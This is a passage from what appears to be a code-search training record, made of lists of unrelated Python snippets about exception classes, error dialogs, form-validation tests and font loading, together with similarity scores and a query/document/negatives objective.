self._error_code = error_code", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['x'].required = True\n self.fields['y'].required = True\n self.fields['width'].required = True\n self.fields['height'].required = True\n self.fields['photo'].required = True", "def test_create_episode_missing_field(self, field_name):\n study_id, session_id = self.init_session()\n episode = sample_episode(study_id=study_id, session_id=session_id)\n episode.ClearField(field_name)\n with self.assertRaises(ValueError):\n self.storage.create_episode(episode)", "def initGUI(self):\n\n\t\t# Set window's title\n\t\tself.parent.title(\"Error Message\")\n\t\t# Creat frames that contain messages and buttons \n\t\tself.buttonFrame = Frame(self.parent)\n\t\tself.buttonFrame.pack(fill = BOTH, expand = True)\n\t\tmessageFrame = Frame(self.buttonFrame, borderwidth = 1)\n\t\tmessageFrame.pack(fill = BOTH, expand = True)\n\t\t# Creat buttons\n\t\tself.makeButtons()\n\t\t# Create and show an error message as an label\n\t\tvar = StringVar()\n\t\tlabel = Message(messageFrame, textvariable=var, relief=RAISED, width = 1000)\n\t\tvar.set(self.message)\n\t\tlabel.pack(fill = BOTH, expand = True)", "def test_invalid_add_post_form_with_image_missing(\n self, proto_post, proto_user\n ):\n\n data = {\n \"title\": \"This is the added title\",\n \"author\": proto_user,\n \"categories\": [21, 22],\n \"overview\": \"This is the added overview\",\n \"content\": \"This is the added content\",\n \"featured\": True,\n \"status\": 1,\n }\n form = PostForm(data)\n assert not form.is_valid()\n assert len(form.errors) == 1\n assert \"thumbnail\" in form.errors", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def error(self, message=None, show_help=True):", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def has_error(self, has_error):\n\n self._has_error = has_error", "def display_error(self, message):\n self.ui_widget.display_error(message=message)", "def test_error_with_empty_dataset_field(self):\n response = self.client.post(self.get_url(), {'object': ''})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', 'object',\n 'This field is required.')", "def missing(self):\n return self.MISSING", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def __init__(self, obj, path, notes=()):\n format_dict = {'attribute': path[-1], 'object_name': obj._name}\n message = (\"'{attribute}' has invalid value inside '{object_name}'\"\n .format(**format_dict))\n notes = [obj.help(path[-1], return_help=True)] + list(notes)\n super(PlotlyDictValueError, self).__init__(\n message=message, notes=notes, path=path\n )", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, message):\n ModelException.__init__(self, message)", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def raise_error(field: str, message: str, parent_error: Optional[Exception] = None) -> NoReturn:\n if parent_error is None:\n raise RowGenParseError(json, field, message)\n raise RowGenParseError(json, field, message) from parent_error", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def __init__(self, message, fatal, error_num=None):\n Exception.__init__(self, message)\n self.fatal = fatal\n self.errno = error_num", "def error_message(self, error_message):\n\n self._error_message = error_message", "def post_init(self, msg='hello'):\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"%s at %s\" % (msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_construct_frame_tag_error(attributes, exception, error_msg):\n with pytest.raises(exception) as exc:\n Frame(**attributes)\n\n assert error_msg in str(exc)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n JhmdbPCKAccuracy(norm_item='invalid')", "def add_error(self, msg):\n self._add_message(msg, self._errors)", "def __init__(self, parent, message, image_to_displayed=None):\r\n\r\n self.text_ = message\r\n path_dir = os.path.dirname(os.path.realpath(__file__))\r\n if image_to_displayed == \"warning\":\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/warning.png\")\r\n elif image_to_displayed == 'check':\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/check.png\")\r\n else:\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/error.png\")\r\n\r\n self.image_ = image_\r\n BasicDialog.__init__(self, parent, title=None)", "def no_file_error(self: object) -> None:\n messagebox.showerror(\"No file selected\", \"Please select a file\")" ]
[ "0.56805265", "0.56665206", "0.5585767", "0.5569392", "0.5561353", "0.5527256", "0.55132455", "0.54539883", "0.5443838", "0.5439777", "0.54118824", "0.54014623", "0.54014623", "0.54014623", "0.53982174", "0.5364648", "0.5359602", "0.5337795", "0.5311328", "0.5287791", "0.5287027", "0.5273246", "0.52648157", "0.52509266", "0.52393657", "0.52363855", "0.52172285", "0.5211836", "0.52090544", "0.51861376", "0.5153515", "0.51496536", "0.5147504", "0.512138", "0.51171064", "0.50981647", "0.5090011", "0.5088339", "0.5078565", "0.5074387", "0.5074211", "0.5065158", "0.50585556", "0.5054672", "0.5050705", "0.5042692", "0.5039633", "0.50207496", "0.4998971", "0.49968985", "0.4996049", "0.49941036", "0.49920636", "0.49877673", "0.4976568", "0.49751836", "0.4968923", "0.4967454", "0.4967253", "0.4954628", "0.49511445", "0.49442118", "0.49437693", "0.49325335", "0.4927845", "0.49235225", "0.49129927", "0.49125895", "0.49103868", "0.4902155", "0.4899307", "0.48969752", "0.48951072", "0.48867282", "0.48773456", "0.48706892", "0.4864483", "0.48640206", "0.48616925", "0.48528078", "0.484531", "0.48423496", "0.4842097", "0.4840556", "0.48364744", "0.48325256", "0.48325256", "0.48325256", "0.48286778", "0.4825565", "0.4818391", "0.48178038", "0.4814484", "0.48125187", "0.48113757", "0.47947347", "0.4792107", "0.4788461", "0.47830364", "0.47818184", "0.47808093" ]
0.0
-1
Initializes FontNotFound with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadSystemFont(name, size):\n\n try:\n f = pygame.font.SysFont(name,size)\n except error, message:\n print \"Cannot load font: \", name\n raise SystemExit, message\n return f", "def loadDefaultFont(size):\n\n try:\n f = pygame.font.Font(None,size)\n except error, message:\n print \"Cannot load the default font\"\n raise SystemExit, message\n return f", "def FindOrCreateFont(*args, **kwargs):\n return _gdi_.FontList_FindOrCreateFont(*args, **kwargs)", "def __init__(self, *args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n _gdi_.Font_swiginit(self,_gdi_.new_Font(*args, **kwargs))", "def initialize():\n #carga las fuente del usuario\n for family in USER_FONTS:\n for font in USER_FONTS[family]:\n name, path = USER_FONTS[family][font]\n pdfmetrics.registerFont(TTFont(name, path))", "def _instantiateFont(self, path):\n return self._fontClass(path,\n libClass=self._libClass,\n kerningClass=self._kerningClass,\n groupsClass=self._groupsClass,\n infoClass=self._infoClass,\n featuresClass=self._featuresClass,\n glyphClass=self._glyphClass,\n glyphContourClass=self._glyphContourClass,\n glyphPointClass=self._glyphPointClass,\n glyphComponentClass=self._glyphComponentClass,\n glyphAnchorClass=self._glyphAnchorClass)", "def __init__(self, *args, **kwargs):\n _gdi_.GraphicsFont_swiginit(self,_gdi_.new_GraphicsFont(*args, **kwargs))", "def load_font(fontname, fontsize):\n # system fonts\n if pygame.font.get_fonts().count(fontname) == 1:\n return pygame.font.SysFont(fontname, fontsize)\n # standard MS fonts\n if os.path.exists('/usr/share/fonts/truetype/msttcorefonts/'+fontname+'.ttf'):\n return pygame.font.Font('/usr/share/fonts/truetype/msttcorefonts/'+fontname+'.ttf', fontsize)\n # search /usr/share/fonts/\n for root, dirs, files in os.walk('/usr/share/fonts'):\n if fontname+'.ttf' in files:\n return pygame.font.Font(os.path.join(root, fontname+'.ttf'), fontsize)\n # search in working dir\n if os.exists('./'+fontname+'.ttf'):\n return pygame.font.Font(fontname+'.ttf', fontsize)\n # last resort: return default font\n return pygame.font.Font(None, fontsize)", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def loadCustomFont(path,name,size):\n\n fullname = os.path.join(path,name)\n f = pygame.font.Font(fullname,size)\n return f", "def defaultFont(self, p_int=None): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def load_font(fontSize):\n f1='/usr/share/fonts/corefonts/arialbd.ttf' \n f2='/usr/share/fonts/truetype/msttcorefonts/Arial_Bold.ttf'\n if os.path.isfile(f1): font=ImageFont.truetype(f1,fontSize)\n if os.path.isfile(f2): font=ImageFont.truetype(f2,fontSize)\n return font", "def selectfont(self, char):\n\n charcode = ord(char)\n for font in fontchecksequence:\n for fontrange in fontmapping[font]:\n if charcode in xrange(fontrange[0], fontrange[1]):\n return font\n return \"Helvetica\" # fallback, if no thirdparty font is installed", "def load_fonts(self):\n for key, font in enumerate(self.fonts):\n self.fonts[key]['font'] = load_font(font['name'], font['size'])\n checkpoint('fonts')", "def _create_font(cls, font, size):\n if font[-4:] in (\".ttf\", \".otf\"):\n return pygame.font.Font(font, size)\n else:\n return pygame.font.SysFont(font, size)", "def load_font(self, path: str, font_family: str, mode: str='n') -> None:\n font = PDFTrueTypeFont('F'+str(self.index), path)\n if not font_family in self.fonts:\n self.fonts[font_family] = {'n': font}\n self.fonts[font_family][mode] = font\n self.index += 1", "def _findExternalFontName(self, font): #copied from piddlePDF by cwl- hack away!\n\n piddle_font_map = {\n 'Times': 'Times',\n 'times': 'Times',\n 'Courier': 'Courier',\n 'courier': 'Courier',\n 'helvetica': 'Helvetica',\n 'Helvetica': 'Helvetica',\n 'symbol': 'Symbol',\n 'Symbol': 'Symbol',\n 'monospaced': 'Courier',\n 'serif': 'Times',\n 'sansserif': 'Helvetica',\n 'ZapfDingbats': 'ZapfDingbats',\n 'zapfdingbats': 'ZapfDingbats',\n 'arial': 'Helvetica'\n }\n\n try:\n face = piddle_font_map[font.facereqFace.lower()]\n except Exception:\n return 'Helvetica'\n\n name = face + '-'\n if font.bold and face in ['Courier', 'Helvetica', 'Times']:\n name = name + 'Bold'\n if font.italic and face in ['Courier', 'Helvetica']:\n name = name + 'Oblique'\n elif font.italic and face == 'Times':\n name = name + 'Italic'\n\n if name == 'Times-':\n name = name + 'Roman'\n # symbol and ZapfDingbats cannot be modified!\n\n #trim and return\n if name[-1] == '-':\n name = name[0:-1]\n return name", "def not_found_error(error):\n return render_template('errors/404.html'), 404", "def get_named_font(*a, **kw):\n return get_named_font(*a, **kw)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def SetNativeFontInfoFromString(*args, **kwargs):\n return _gdi_.Font_SetNativeFontInfoFromString(*args, **kwargs)", "def test_missing_glyph_list(tmpdir):\n path = \"%s/dummy/font.ufo\" % DATA_DIR\n out = str(tmpdir / basename(path)) + \".out\"\n\n with pytest.raises(ACFontError):\n psautohint([path, '-o', out, '-g', 'FOO,BAR'])", "def not_found(error):\n pass", "def set_font(self, font):\n\ttry:\n\t self.m_gdfont = self._fonts[font.lower()]\n\t self.m_font = font\n\texcept KeyError:\n\t raise ValueError, 'Illegal font name.'", "def create(font_name, point):\n return pygame.font.SysFont(font_name, int(point))", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, font='mediumbold'):\n\tself.set_font(font)", "def get_font_dict(f):\n return tk_font.Font(font=f).actual()", "def get_named_font(f, **kw):\n if _named_fonts_d.get(\"TkDefaultFont\") is None:\n for name in list(_named_fonts_d.keys()):\n _named_fonts_d[name] = tk_font.nametofont(name)\n #\n if f:\n fo = tk_font.Font(font=f)\n f_d = fo.actual()\n if kw:\n fo.config(**kw)\n f_d.update(**kw)\n for nf in _named_fonts_d:\n nf_d = tk_font.nametofont(nf).actual()\n if f_d == nf_d:\n return _named_fonts_d[nf]\n # didn't find it, so store created\n _named_fonts_d[str(fo)] = fo\n return fo\n return None", "def mistake_not_found():\n win6 = Toplevel(root)\n win6.title(\"Ошибка\")\n win6.geometry('270x40')\n lbl13 = Label(win6, text=\"Значение не найдено в базе данных!\", width=45, height=2)\n lbl13.place(x=-30, y=0)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, *args, **kwargs):\n _gdi_.DCFontChanger_swiginit(self,_gdi_.new_DCFontChanger(*args, **kwargs))", "def FromString(*args, **kwargs):\n return _gdi_.NativeFontInfo_FromString(*args, **kwargs)", "def SetFont(*args):\n return _gdi_.GraphicsContext_SetFont(*args)", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", "def not_found(error):\n\n return render_template('errors/404.html'), 404", "def CreateFont(name, size):\r\n\ttry:\r\n\t\tf = pygame.font.Font(name, size)\r\n\t\treturn f\r\n\texcept IOError:\r\n\t\treturn pygame.font.SysFont(name, size)", "def setFontDirectory(self,location):\n self.PDFreactorConfiguration.in1[\"fontDirectory\"] = location", "def get_font_path(family, font_format=\"normal\"):\n weight = \"roman\"\n weight = None\n if font_format == \"bold\":\n font_format = \"normal\"\n weight = \"bold\"\n font = matplotlib.font_manager.FontProperties(\n family=family, style=font_format, weight=weight)\n file = matplotlib.font_manager.findfont(font)\n return file", "def FontFromNativeInfoString(*args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n val = _gdi_.new_FontFromNativeInfoString(*args, **kwargs)\n return val", "def getFontPathOfFont(font, default=None):\n if hasattr(font, 'path'): # In case it is a Font instance, get its path.\n font = font.path\n if font is not None and not os.path.exists(font):\n font = getFontPaths().get(font)\n if font is None:\n font = default or getDefaultFontPath()\n return font", "def load_font(self, filename: str) -> None:\n try:\n from fontTools import ttLib\n except:\n raise ImportError(\n 'You need to install library fonttools to add new fonts: '\n 'pip install fonttools'\n )\n self.filename = str(Path(filename))\n self.font = ttLib.TTFont(self.filename)\n\n # TODO: cmap needs to be modifiedfor this to work\n self.cmap = self.font['cmap'].getcmap(3,1).cmap\n self.glyph_set = self.font.getGlyphSet()\n\n self.font_descriptor = self._get_font_descriptor()", "def set_font(self, font):\n\tself.m_font = font", "def create_font_data(self):\n font_data = FontImages()\n if not font_data.assert_data_correct():\n font_data.create_images()\n font_data.augment_data()", "def FFont(*args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n val = _gdi_.new_FFont(*args, **kwargs)\n return val", "def __searchError(self, errorCode, errorString):\n self.__finish()\n E5MessageBox.warning(\n self,\n self.tr(\"Search PyPI\"),\n self.tr(\"\"\"<p>The package search failed.</p><p>Reason: {0}</p>\"\"\")\n .format(errorString))\n self.infoLabel.setText(self.tr(\"Error: {0}\").format(errorString))", "def setDislinFont(font='default'):\n fontdict[font]()", "def SetFont(*args, **kwargs):\n return _gdi_.DC_SetFont(*args, **kwargs)", "def addFont(self, source, family, bold, italic):\n fontArray = {\"source\":source,\"family\":family,\"bold\":bold,\"italic\":italic}\n if (self.PDFreactorConfiguration.in1[\"fonts\"] == None):\n self.PDFreactorConfiguration.in1[\"fonts\"] = []\n self.PDFreactorConfiguration.in1[\"fonts\"].append(fontArray)", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def on_init_fail(self, event_time, message):\n pass", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def add_font(self, base: 'PDFBase') -> 'PDFObject':\n pass", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def test_configs_font(\n self):\n root = Tk()\n custom = font.Font(root, family='Helvetica', size=12)\n self.assertEqual(custom.cget('family'), 'Helvetica')\n fontSelect.font_style(custom, 'Times')\n self.assertEqual(custom.cget('family'), 'Times')\n fontSelect.font_size(custom, 18)\n self.assertEqual(custom.cget('size'), 18)", "def named_font(self, point):\n return Font.create(self.name, point * self.scale)", "def _set_default_font(cls):\n if platform.system() == \"Linux\":\n for family in (\"DejaVu Sans\", \"Noto Sans\", \"Nimbus Sans\"):\n if family in tk.font.families():\n logger.debug(\"Setting default font to: '%s'\", family)\n tk.font.nametofont(\"TkDefaultFont\").configure(family=family)\n tk.font.nametofont(\"TkHeadingFont\").configure(family=family)\n tk.font.nametofont(\"TkMenuFont\").configure(family=family)\n break\n return tk.font.nametofont(\"TkDefaultFont\").configure()[\"family\"]", "def get_font_dict(*a, **kw):\n return get_font_dict(*a, **kw)", "def __init__(self, text, font, pos, color=(255, 255, 255)):\r\n self.pos = pos\r\n self.label = font.render(text, 1, color)", "def open_error_resource():\n need('Estr', 1, filename=\"errors.rsrc\", modname=__name__)", "def not_found(error):\n return f'{\"code\": 404, \"message\": \"Not found\"}', 404", "def resource_not_found(error_msg):\n return jsonify(error=str(error_msg))", "def FromUserString(*args, **kwargs):\n return _gdi_.NativeFontInfo_FromUserString(*args, **kwargs)", "def create_font(font_name, fit = True):\n font = {}\n try:\n numbers = Image.open(fonts_path + font_name + \".jpg\")\n if fit:\n numbers = images.fit_to_display(numbers, True)\n width, height = numbers.size\n font[\"d\"] = Image.open(fonts_path + \"degree.jpg\")\n font[\"d\"] = images.fit_to_display(font[\"d\"])\n font[\"p\"] = Image.open(fonts_path + \"percent.jpg\")\n font[\"p\"] = images.fit_to_display(font[\"p\"])\n font[\"m\"] = Image.open(fonts_path + \"am.jpg\")\n font[\"m\"] = images.fit_to_display(font[\"m\"], True)\n font[\"a\"] = Image.open(fonts_path + \"pm.jpg\")\n font[\"a\"] = images.fit_to_display(font[\"a\"], True)\n d_w, d_h = font[\"d\"].size\n font[\"d\"] = font[\"d\"].crop((10,0,d_w-10,d_w))\n box_width = float(width)/10 \n #Crop out each character in the provided image and save that to a dictionary\n for i in range(0, 10):\n box = [int(round(i*(box_width))), 0, int(round((i + 1)*(box_width))), height]\n #Checks if a subrectangle passes the width of the image, and shortens it if necessary\n if box[3] > width:\n box[3] = width\n \n box = tuple(box)\n font[str(i)] = numbers.crop(box) \n return font\n except IOError:\n print(\"Specified font file: %s.jpg cannot be found at: %s\" % (font_name,fonts_path))", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def not_found(e):\n return render_template(\"errors/404.html\"), 404", "def error_not_found(error):\n return 'No page here, dood. 404!', 404", "def error(self, msg):\n with self._lock:\n self.wraptext(msg, fg=\"red\", bold=True)\n return self", "def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404", "def set_font(self, font: str):\n self.font = font", "def not_found_msg(error):\n if request.path.startswith(\"/api\"):\n # Respond with JSON data with message and 404 code\n if isinstance(error, NotFound):\n message = str(error)\n else:\n message = f\"API endpoint {request.path!r} does not exist.\"\n response = jsonify({\"message\": message}), 404\n else:\n # Respond with 404 page\n message = error.message if isinstance(error, NotFound) else None\n response = render_template(\"not_found.html\", message=message), 404\n\n return response", "def page_not_found(error):\r\n return render_template('error_template.html' , title = \"404 bud\", \r\n \t\t\t\t\t\t\t\t\t\t\t\tmessage = \"Time to make the chimi-fuckin'-changas. \",\r\n \t\t\t\t\t\t\t\t\t\t\t\tsubline = \"404, not there\", \r\n \t\t\t\t\t\t\t\t\t\t\t\timage_location = url_for('static', filename = 'images/deadpool-funny.jpg') ), 404", "def test_check_familyname_matches_fontnames(self):\n contents = self.read_metadata_contents()\n fm = Metadata.get_family_metadata(contents)\n for font_metadata in fm.fonts:\n _ = '%s: Family name \"%s\" does not match font name: \"%s\"'\n _ = _ % (font_metadata.filename, fm.name, font_metadata.name)\n self.assertEqual(font_metadata.name, fm.name, _)", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def page_not_found(error):\n error_message = str(error)\n return render_template('error-pages/404-page.html', error_message=error_message, isFooter=True), 404", "def addFont(self, name, family=\"nil\", alt=None):\n\n id = len(self.fonts)\n self.fonts.append(Font(id, name, family, alt))\n return id", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def notfound(error):\n\n categories = [ \"business\",\n \"entertainment\",\n \"general\",\n \"health\",\n \"science\",\n \"sports\",\n \"technology\"\n ]\n return render_template(\"notfound.html\", categories = categories), 404", "def not_found(error):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n 'error': error}\n resp = jsonify(message)\n return resp", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def page_not_found(error):\n return render_template('error.html', error_msg=\"404 Page Not Found\", pagetitle=\"404 Page Not Found\"), 404", "def __setup__(cls):\n super(Country, cls).__setup__()\n cls._error_messages.update({\n 'country_not_found': 'Country with ISO code %s does not exist.',\n })", "def fontforge_skip_checks():\n return None", "def fontforge_skip_checks():\n return None", "def test_file_invalid(self) -> None:\n with pytest.raises(FileNotFoundError) as ex:\n CSSFormatter.format(\"/invalid/file.css\")\n assert \"No such file or directory\" in str(ex)", "def getFont(fontsize):\n\t\t\n\tfontPath = os.path.join(GATEWAYPATH, \"pilfonts\", \"FreeSans.ttf\")\n\ttry:\n\t\tfont = ImageFont.truetype ( fontPath, fontsize )\t\n\texcept:\n\t\tfont = ImageFont.load('%s/pilfonts/B%0.2d.pil' % (GATEWAYPATH, 24) )\n\treturn font", "def get_font_map(self): # real signature unknown; restored from __doc__\n pass", "def GetItemFont(self, item):\r\n\r\n font = item.Attr().GetFont()\r\n if font.IsOk():\r\n return font\r\n\r\n return wx.NullFont", "def pkg_not_found_mess(pkgname: str, reponame: str) -> None:\n meta = MainData()\n print(('{0}Package {1}{2} {0}not found in \\'{3}\\' '\n 'repository.{4}').format(meta.clrs['red'],\n meta.clrs['lcyan'],\n pkgname,\n reponame,\n meta.clrs['reset']))", "def _page_not_found():\n return render_template(\n \"error.html\",\n title=\"Page Not Found\"\n ), 404", "def load_font(font_path):\n\n # ttc is collection of ttf\n if font_path.endswith('ttc'):\n ttc = TTCollection(font_path)\n # assume all ttfs in ttc file have same supported chars\n return ttc.fonts[0]\n\n if font_path.endswith('ttf') or font_path.endswith('TTF') or font_path.endswith('otf'):\n ttf = TTFont(font_path, 0, allowVID=0,\n ignoreDecompileErrors=True,\n fontNumber=-1)\n\n return ttf", "def not_found_404(error):\n return jsonify({\n 'success': False,\n 'message': 'Resource not found',\n 'error': 404\n }), 404", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def GetFont(*args, **kwargs):\n return _gdi_.StockGDI_GetFont(*args, **kwargs)", "def display_404(error):\n return render_template('/error.html'), 404", "def _load_font(file: str) -> None:\n\n pyglet.font.add_file(Config.RES_DIR + \"font\" + Config.FILE_SEPARATOR + file)\n pyglet.font.load(\"Munro\")", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def print_file_notfound(cls, filename):\n print(\n f\"{cls.ERROR_PREFIX} {cls.FILE_NOTFOUND_MESSAGE} '{realpath(filename)}'.\"\n )", "def test_loading_a_text_style_with_extended_font_data(self, sdoc):\n tdoc = ezdxf.new()\n loader = xref.Loader(sdoc, tdoc)\n loader.load_text_styles([\"arial\"])\n loader.execute()\n assert document_has_no_errors(tdoc) is True\n\n arial = tdoc.styles.get(\"arial\")\n assert arial.dxf.name == \"ARIAL\", \"expected text style ARIAL in target doc\"\n\n family, italic, bold = arial.get_extended_font_data()\n assert family == \"Arial\"\n assert italic is False\n assert bold is True" ]
